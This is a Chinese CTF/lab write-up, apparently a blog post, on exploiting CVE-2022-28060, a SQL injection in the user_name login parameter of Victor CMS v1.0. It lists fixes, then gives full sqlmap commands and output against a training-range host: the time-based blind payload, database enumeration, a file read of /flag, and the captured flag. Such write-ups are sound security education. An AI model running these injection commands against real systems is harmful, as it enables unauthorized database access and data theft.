内蒙古做网站找谁,优质商品网上购物商城,flash网站怎么做,网站优化西安前言
CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于 /includes/login.php 文件中的 user_name 参数。攻击者可以通过发送特制的 SQL 语句#xff0c;利用这个漏洞执行未授权的数据库操作#xff0c;从而访问或修改数据库中的敏感信息。
漏洞详细信…前言
CVE-2022-28060 是 Victor CMS v1.0 中的一个SQL注入漏洞。该漏洞存在于 /includes/login.php 文件中的 user_name 参数。攻击者可以通过发送特制的 SQL 语句利用这个漏洞执行未授权的数据库操作从而访问或修改数据库中的敏感信息。
漏洞详细信息
漏洞类型SQL注入受影响的组件Victor CMS v1.0攻击途径远程攻击者可以利用该漏洞通过发送特制的请求来执行任意的 SQL 语句。漏洞严重性高 (CVSS v3 基础分数7.5)
解决方案
使用准备好的语句采用预编译的 SQL 语句或参数化查询来处理 SQL 请求。输入验证对所有用户输入进行严格的验证和过滤确保只接受符合预期格式的输入。最小权限原则为数据库用户分配最低的权限确保即使发生注入攻击攻击者也无法获得过多的权限
春秋云镜靶场是一个专注于网络安全培训和实战演练的平台旨在通过模拟真实的网络环境和攻击场景提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点
实战演练
提供各种网络安全攻防演练场景模拟真实的网络攻击事件帮助用户在实际操作中掌握网络安全技术。 场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现
用户可以通过平台对已知的安全漏洞进行复现了解漏洞的产生原因、利用方法和修复措施。 通过实战操作帮助用户掌握漏洞利用和防护的技能。
教学培训
提供系统化的网络安全课程从基础到高级覆盖多个安全领域适合不同水平的用户。 包含理论讲解和实战操作帮助学员全面提升网络安全知识和实战能力。
竞赛与评测
定期举办网络安全竞赛如CTFCapture The Flag比赛激发学员的学习兴趣和动力。提供个人和团队的安全能力评测帮助学员了解自己的安全技能水平。
资源共享
平台提供丰富的学习资源包括教程、工具、案例分析等方便用户随时查阅和学习。 用户可以在社区中分享经验和资源互相交流和学习。
春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人通过在平台上进行不断的学习和实战演练可以有效提升网络安全技能和防护能力。
介绍
Victor CMS v1.0 是一个设计用于管理和发布网站内容的开源内容管理系统CMS。以下是关于Victor CMS v1.0 的主要特点和功能
主要特点 内容管理 提供用户友好的界面支持创建、编辑和发布网站内容包括文章、页面和多媒体文件。 用户管理 允许管理员创建和管理用户账户设定不同的权限和角色如管理员和编辑。 主题和定制 支持多种主题和模板用户可以根据需求自定义网站的外观和布局。 多语言支持 提供多语言功能使得网站内容可以用多种语言呈现满足全球用户的需求。 SEO优化 集成了搜索引擎优化SEO功能帮助网站内容更容易被搜索引擎索引和检索。 安全性 考虑了数据安全和用户认证支持基本的访问控制和身份验证机制。
应用场景
Victor CMS v1.0 适用于小型企业、个人博客和社区网站提供了一个简单而功能丰富的内容管理平台。用户可以利用其灵活的功能来构建和管理各种类型的网站从而满足不同用户的需求。
开发和社区支持
作为开源项目Victor CMS v1.0 提供了开放的开发环境和社区支持。用户可以访问其 GitHub 页面和相关社区论坛获取技术支持、更新和定制建议。
总结
Victor CMS v1.0 是一个适用于各种网站项目的开源内容管理系统通过其简单易用的界面和丰富的功能为用户提供了创建和管理网站内容的便利。如果你对搭建个人网站或小型企业网站感兴趣Victor CMS v1.0 可能是一个值得考虑的选择。
漏洞复现
打开靶场 加载网页有点抽象得往下滑才能找到登录框 随便输入数值然后抓包拦截 可以看到是 POST 的形式复制数据包的值到 txt 文件中 先探测一波发现 user_name 字段存在 SQL 注入
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch_____H_____ ___[.]_____ ___ ___ {1.8.4#stable}
|_ -| . [)] | .| . |
|___|_ [.]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting 15:56:03 /2024-06-30/[15:56:03] [INFO] parsing HTTP request from sqlmap.txt
[15:56:03] [WARNING] provided value for parameter login is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:56:03] [INFO] testing connection to the target URL
[15:56:03] [INFO] testing if the target URL content is stable
[15:56:04] [INFO] target URL content is stable
[15:56:04] [INFO] testing if POST parameter user_name is dynamic
[15:56:04] [WARNING] POST parameter user_name does not appear to be dynamic
[15:56:04] [WARNING] heuristic (basic) test shows that POST parameter user_name might not be injectable
[15:56:04] [INFO] testing for SQL injection on POST parameter user_name
[15:56:04] [INFO] testing AND boolean-based blind - WHERE or HAVING clause
[15:56:04] [INFO] testing Boolean-based blind - Parameter replace (original value)
[15:56:04] [INFO] testing MySQL 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
[15:56:05] [INFO] testing PostgreSQL AND error-based - WHERE or HAVING clause
[15:56:05] [INFO] testing Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
[15:56:06] [INFO] testing Oracle AND error-based - WHERE or HAVING clause (XMLType)
[15:56:06] [INFO] testing Generic inline queries
[15:56:06] [INFO] testing PostgreSQL 8.1 stacked queries (comment)
[15:56:07] [INFO] testing Microsoft SQL Server/Sybase stacked queries (comment)
[15:56:07] [INFO] testing Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)
[15:56:07] [INFO] testing MySQL 5.0.12 AND time-based blind (query SLEEP)
[15:56:28] [INFO] POST parameter user_name appears to be MySQL 5.0.12 AND time-based blind (query SLEEP) injectable
it looks like the back-end DBMS is MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for MySQL extending provided level (1) and risk (1) values? [Y/n] Y
[15:56:28] [INFO] testing Generic UNION query (NULL) - 1 to 20 columns
[15:56:28] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
got a 302 redirect to http://eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/index.php. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
[15:56:30] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option --union-char? [Y/n] Y
[15:56:40] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbmsmysql)
[15:56:40] [INFO] checking if the injection point on POST parameter user_name is a false positive
POST parameter user_name is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL 5.0.12 AND time-based blind (query SLEEP)Payload: user_nameadmin AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND ofTEofTEuser_passwordadminlogin
---
[15:57:10] [INFO] the back-end DBMS is MySQL
[15:57:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
back-end DBMS: MySQL 5.0.12
[15:57:11] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com[*] ending 15:57:11 /2024-06-30/暴力破解数据库
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch --dbs_____H_____ ___[,]_____ ___ ___ {1.8.4#stable}
|_ -| . [.] | .| . |
|___|_ []_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting 15:57:32 /2024-06-30/[15:57:32] [INFO] parsing HTTP request from sqlmap.txt
[15:57:32] [WARNING] provided value for parameter login is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:57:32] [INFO] resuming back-end DBMS mysql
[15:57:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL 5.0.12 AND time-based blind (query SLEEP)Payload: user_nameadmin AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND ofTEofTEuser_passwordadminlogin
---
[15:57:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[15:57:32] [INFO] fetching database names
[15:57:32] [INFO] fetching number of databases
[15:57:32] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option --time-sec)? [Y/n] Y
[15:57:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[15:57:56] [INFO] retrieved:
[15:58:06] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[16:00:09] [INFO] retrieved: mysql
[16:00:44] [INFO] retrieved: performance_schema
[16:02:46] [INFO] retrieved: php_cms
[16:03:51] [INFO] retrieved: sys
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_cms
[*] sys在 mysql 库中查找文件 flag
┌──(root㉿kali)-[/home/suc2es2]
└─# sqlmap -r sqlmap.txt --batch -D mysql --file-read /flag_____H_____ ___[]_____ ___ ___ {1.8.4#stable}
|_ -| . [] | .| . |
|___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting 16:21:11 /2024-06-30/[16:21:11] [INFO] parsing HTTP request from sqlmap.txt
[16:21:11] [WARNING] provided value for parameter login is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[16:21:11] [INFO] resuming back-end DBMS mysql
[16:21:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)Type: time-based blindTitle: MySQL 5.0.12 AND time-based blind (query SLEEP)Payload: user_nameadmin AND (SELECT 6619 FROM (SELECT(SLEEP(5)))JhxZ) AND ofTEofTEuser_passwordadminlogin
---
[16:21:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[16:21:11] [INFO] fingerprinting the back-end DBMS operating system
[16:21:14] [INFO] the back-end DBMS operating system is Linux
[16:21:14] [INFO] fetching file: /flag
[16:21:14] [INFO] retrieved:
[16:21:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option --time-sec)? [Y/n] Y
6
[16:21:44] [INFO] adjusting time delay to 1 second due to good response times
66C61677B39623135393033642D313165642D343032632D613232622D6434666537303065656330367D
do you want confirmation that the remote file /flag has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[16:27:51] [INFO] retrieved: 42
[16:27:59] [INFO] the local file /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag and the remote file /flag have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag (same file)[16:27:59] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com[*] ending 16:27:59 /2024-06-30/访问 flag
──(root㉿kali)-[/home/suc2es2]
└─# cat /root/.local/share/sqlmap/output/eci-2ze7i6mdn52cbhya3l8h.cloudeci1.ichunqiu.com/files/_flag
flag{9b15903d-11ed-402c-a22b-d4fe700eec06}
